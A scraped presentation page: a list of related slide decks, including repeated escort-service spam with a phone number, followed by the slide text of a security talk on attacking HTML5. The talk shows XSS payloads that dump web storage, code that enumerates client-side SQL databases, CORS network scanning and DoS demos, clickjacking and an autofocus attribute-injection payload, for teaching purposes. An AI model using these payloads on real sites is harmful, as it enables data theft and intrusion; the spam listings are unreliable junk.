Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 

Kürzlich hochgeladen (20)

ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 

Html5 hacking

  • 1. Attacking HTML5 Israel Chorzevski Application Security Consultant Israel@AppSec-Labs.com
  • 2. Agenda  Introduction to HTML5  Attacking HTML5
  • 4. Tags and Attributes  Element tags (canvas, video)  SEO tags (author, footer)  Attributes (autofocus, required)  CSS3 (selectors, 3D) Integration features  Geolocation  Drag & Drop files
  • 5. Session Storage Cookie Session Storage Maximum size * 4 KB Some MB Content sent With any request Not sent Can be accessed from Any window Only the same window Always when window Deleted after Fixed time closed Range Per directory Whole site HttpOnly Flag Yes No * IE8 supports up to 10kb
  • 6. Local Storage vs. Session Storage Session storage Local storage Maximum size 5 MB 10-15 MB Can be accessed from Only the same window Any window Deleted when Window is closed Not deleted Local Storage ~ AKA Global Storage
  • 7. SQL Storage  SQLite ◦ Standard SQL  IndexedDB ◦ Object Oriented
  • 8. Cross Origin Resource Sharing  The old methods: <iframe src=“http://site.com/home.htm”></iframe>  Stupid block <script src=“http://site.com/home.js”></script>  You run the script from another domain on your site!  The new method: AJAX with Cross Origin Policy  You have full control on the data and the combination with your site
  • 9. Cross Document Messaging  Send messages between the main page and the iframes. Web Sockets  Open sockets and connections. Web Workers  Execute JS code under another thread.
  • 11. Storage attacks – Stealing Data  Goal ◦ Get Sensitive Data ◦ User Tracking  Technique ◦ An XSS anywhere in the application can be used to draw the data from site after the use. ◦ User leaves the computer after browsing to another site.
  • 12. Storage attacks – Stealing Data  Vulnerabilities ◦ No HTTPONLY Flag ◦ No expiration date ◦ No directory separation  Cross directory attack ◦ Cross port attack (Chrome is protected)
  • 13. Storage attacks – Dump data  Old XSS exploit <script>alert(document.cookie)</script>  New XSS exploit <script>alert(window.localStorage.key)</script>
  • 14. Storage attacks – Dump data  Get values var ss = ""; for(i in window.sessionStorage) ss += i + " ";  Get names & values var ss = ""; for(i = 0; i < window.sessionStorage.length; i++) ss += window.sessionStorage.key(i) + ":" + sessionStorage.getItem(sessionStorage.key(i)) + " ";
  • 15. Storage attacks – Spoofing data  Goal ◦ CSRF ◦ Denial of Service (data parsing crash) ◦ Stored XSS  Technique ◦ URL parameter – can be simply spoofed ◦ http://localhost:81/html5/storage/url-xss.htm?username=david ◦ Local event – can spoof by click jacking ◦ XSS somewhere in the application
  • 16. SQL Storage attacks – Spoofing  SQL Injection ◦ Tweets updater: https://www.andlabs.org/html5/csSQLi.html  Persistent XSS by SQL (XSSQLI) ◦ No input validation, no output encoding https://www.andlabs.org/html5/csXSS1.html ◦ Input validation without Output encoding https://www.andlabs.org/html5/csXSS2.html
  • 17. SQL Storage attacks – Dump data  Get objects (connected to the DB) var db = ""; for(i in window) if(window[i] == “[object Database]”) db += i + “ “;  Get tables: SELECT name FROM sqlite_master WHERE type='table‘
  • 18. Storage attacks – Demo https://www.andlabs.org/html5/csSQLi.html http://localhost:81/html5/storage/draw.js document.write("<script src='http://localhost:81/html5/storage/draw.js'></script>");
  • 19. Cross Origin Request - Technical  Origin header in the request  Origin header in the response
  • 20. Cross Origin Request - Technical  Browser will send cookies along with the request, only if the request is set to send “credentials”: cor.open('GET', url); cor.withCredentials = "true"; cor.send();  Server answers with the header: Access-Control-Allow-Credentials: true  If server doesn't answer the credentials header (or answers false), the page will not load.  Access-Control-Allow-Origin can’t be * if credentials are marked as true.
  • 21. Cross Origin Policy - Attacks  Scanning the internal network http://localhost:81/html5/COR/cor.php https://www.andlabs.org/tools/jsrecon.html  Accessing internal websites  Fast DDoS by POST method http://localhost:81/html5/COR/corDoS.php  Reverse CORS requests
  • 22. Cross Document Messaging - Attacks  Demo ◦ http://c0-m0.victim-site.com/html5/postMessage/main.htm  Attacks ◦ XSS ◦ CSRF ◦ Information disclosure
  • 23. Clickjacking  CSS3: ◦ var e = document.getElementById('iframe').style; ◦ e.ffilter = 'alpha(opacity=0.5)'; ◦ e.mag.opacity = 0.5;  Demo – lolcat generator: ◦ http://localhost:81/html5/click_jacking2/lolcat.php http://c0-m0.victim-site.com/php/clickjacking/
  • 24. Clickjacking  The old protection (Frame-Busting) script: <script> if(top.location != self.location) top.location = self.location; </script>  Demo: http://localhost:81/html5/sandbox/open_iframe.php
  • 25. Clickjacking - Sandbox  HTML: <iframe sandbox="" src="" ></iframe>  Options: ◦ allow-same-origin ◦ allow-top-navigation ◦ allow-forms ◦ allow-scripts  Demo: ◦ http://localhost:81/html5/sandbox/sandbox_iframe.php
  • 26. Web Socket  http://slides.html5rocks.com/#web-sockets  http://html5demos.com/web-socket  https://www.andlabs.org/tools/ravan.html  https://www.andlabs.org/tools/jsrecon.html
  • 27. Web Workers  main.js: var worker = new Worker('task.js'); worker.onmessage = function(event) { alert(event.data); }; worker.postMessage('data');  task.js: self.onmessage = function(event) { self.postMessage("recv'd: " + event.data); };  Test:  https://www.andlabs.org/tools/jsrecon.html  http://localhost:81/html5/COR/scanner/
  • 29. Geolocation - Risk  User Tracking ◦ House burglars know when to strike. ◦ The anonymity of users could be broken.
  • 30. Geolocation Risks – Mitigations  User needs to accept tracking for any site.  Opt-In ◦ Google Chrome:  Accept once IE9 FF5
  • 31. Geolocation Risks – Private mode  IE9:  Google Chrome & FF5 Remember the accept of location sharing!  Google Developer: I'm tending towards WontFix. https://code.google.com/p/chromium/issues/detail?id=87387
  • 32. New exploitation for old attacks  Vulnerability pharse: <input type=ʺtextʺ value=ʺ‐‐>Injecting hereʺ />  Before HTML5: ʺ onmouseover=ʺalert(0)  With HTML5: ʺ onfocus=ʺalert(0)ʺ autofocus= ʺ  Demo http://localhost:81/html5/new_exploits/xss.php
  • 33. Summary  HTML5 adds features that allow new browser capabilities.  In this presentation we have demonstrated innovative ways for attackers to exploit & utilize these capabilities for malicious purposes.  Have fun playing & hacking with HTML5! 
  • 34.